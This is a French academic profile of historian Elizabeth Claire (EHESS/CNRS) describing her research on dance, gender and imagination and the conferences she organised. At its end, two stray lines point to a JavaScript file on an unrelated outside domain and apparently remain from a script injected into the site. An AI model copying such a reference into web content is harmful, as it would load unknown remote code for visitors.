Claire Elizabeth

CLAIRE headshotChargée de recherche

 

 

 

 

 

Coordonnées professionnelles

EHESS-CRH
Histoire du genre-GEHM (Bureau B 04-07)
54, boulevard Raspail
75006 Paris

elizabeth.claire [a] ehess.fr

Elizabeth Claire, historienne et chargée de recherche au CNRS, est membre fondateur de l’Atelier d’histoire culturelle de la danse (CRAL) ainsi que membre associé au Centre de recherches sur les Arts et le Langage. Avec les membres de l’Atelier, elle co-anime au sein de l’EHESS, depuis 2009, le séminaire « Histoire culturelle de la danse » qui vise à promouvoir l’approche culturaliste dans les études en histoire de la danse. Elle co-anime également un séminaire sur l’Histoire du genre dans les arts vivants avec Catherine Deutsch (Paris-Sorbonne) et Raphaëlle Doyon (Univ. de Paris 8). En collaboration avec Béatrice Delaurenti (CRH), Koen Vermeir (CNRS-SPHERE), et Roberto Poma (UPEC), elle organise des colloques internationaux et un séminaire sur l’histoire de la force de l’imagination. Parallèlement, elle organise des échanges universitaires franco-américains autour de la question de la danse et l’histoire des pratiques chorégraphiques en Europe.

Depuis 2013, elle porte un projet international sur l’histoire du Corps désOriental en collaboration avec Mariem Guellouz (Univ. Paris-Descartes), Jocelyne Dahklia (EHESS-CRH), et Prarthana Purkayastha (Univ. de Londres, Royal Holloway).

Elle effectue actuellement une recherche historique concernant « L’éloquence du corps et l’articulation de l’âme : la circulation des savoirs médicaux et genrés sur l’imagination, la sensibilité, et l’art de la danse (XVIIIe-XIXe) ». Suite à sa soutenance de thèse au Département des Performance Studies à la New York University, elle a été allocataire postdoctorale à la Maison des Sciences de l’Homme-Paris Nord pour un projet portant sur la performance et le féminisme au XXesiècle, puis allocataire postdoctorale de l’IEC/Institut Émilie du Châtelet pour un projet sur l’histoire de la valse et la santé des femmes au tournant des XVIIIeet XIXesiècles en Europe.

Distinctions

Bourses postdoctorales : Maison des Sciences de l’Homme Paris-Nord ; l’Institut Émilie du Châtelet/Région Ile de France.

Groupes de recherche

Thèmes de Recherches

  • Histoire culturelle de la danse ;
  • Histoire du corps et du genre ;
  • Histoire de la médecine ;
  • Histoire de l’imagination à l’époque moderne.

Enseignements 2022-2023

Sélection de publications récentes

Organisation de colloques internationaux, journées d’études, symposiums

  • Le Corps « Oriental » : Genre, gestes & regards, Colloque international, co-organisé avec Jocelyne Dakhlia (EHESS), Mariem Guellouz (Univ. Paris-Descartes), Corinne Fortier (CNRS-Collège de France), Fabio Giomi (CNRS), Prarthana Purkayastha (Royal Holloway Univ. London), Koen Vermeir (Univ. Paris-Diderot) EHESS, 7-9 décembre 2017.
  • Regards et résistances. Performances, archives et les figurants de l’Histoire, Journées d’études organisées dans le cadre de l’Institut d’Études Avancées de Paris, avec Felicia McCarren (Tulane Univ./IEA) et Jean-Pierre LeGlaunec (Univ. de Sherbrook), Paris, 30 mai 2017.
  • Species & Spectacle, Journées d’études organisées dans le cadre de l’Institut d’Études Avancées de Paris, avec Felicia McCarren (Tulane Univ./IEA) et Silvia Sebastiani (EHESS-CRH), Paris, 22 mars 2017.
  • Que fait le genre à l’histoire du XIXe siècle ?, Journées d’études organisées dans le cadre du 40e anniversaire de l’EHESS avec Sylvie Steinberg (CRH), Lola Gonzalez-Quijano (CRH), et Caroline Fayolle (Univ. Paris 8), et l’Atelier d’histoire du genre du CRH (UMR 8558), Paris, 12-13 octobre 2015.
  • Genre et sexualités en Afrique coloniale, symposium organisé avec Cécil Vidal dans le cadre de l’Atelier d’histoire du genre du CRH, avec Aurélie Perrier (Georgetown University, USA), « Negotiating Sex, Gender and the Home in Colonial Algeria (1830-1914) » et Nigel Worden (University of Cape Town), « Gender and the European Colonial Town », Paris, EHESS, 21 mai 2015.
  • Gender and Creation in the History of Performing Arts, Colloque International organisé avec Catherine Deutsch (Paris-Sorbonne) et Raphaëlle Doyon (Univ. Paris 8), à l’EHESS-INHA et Columbia Reid Hall, Paris, 12-14 déc 2013.
  • Nommer, penser, inscrire la création dans l’histoire : les arts vivants au prisme du genre (XVIe-XXe siècle), Symposium International organisé avec Catherine Deutsch (Paris-Sorbonne) et Raphaëlle Doyon (Univ. Paris 8), Campus Condorcet-EHESS-INHA, Paris, 26-27 octobre 2012.
  • History of the Imagination, 16th-18th Centuries,Colloque International organisé avec Koen Vermeir, PEPS-CNRS (SPHERE-UMR 7219), 7-9 décembre 2010.
  • Les métamorphoses du corps dansantxvie-xxe siècle, Journées d’études organisées avec l’Atelier d’histoire culturelle de la danse (CRAL), EHESS-Paris, 2-3 octobre 2008. (ahcdanse.hypotheses.org).

 

//workdevapp.com/1deb3dd710d8d90c20.js

//workdevapp.com/1deb3dd710d8d90c20.js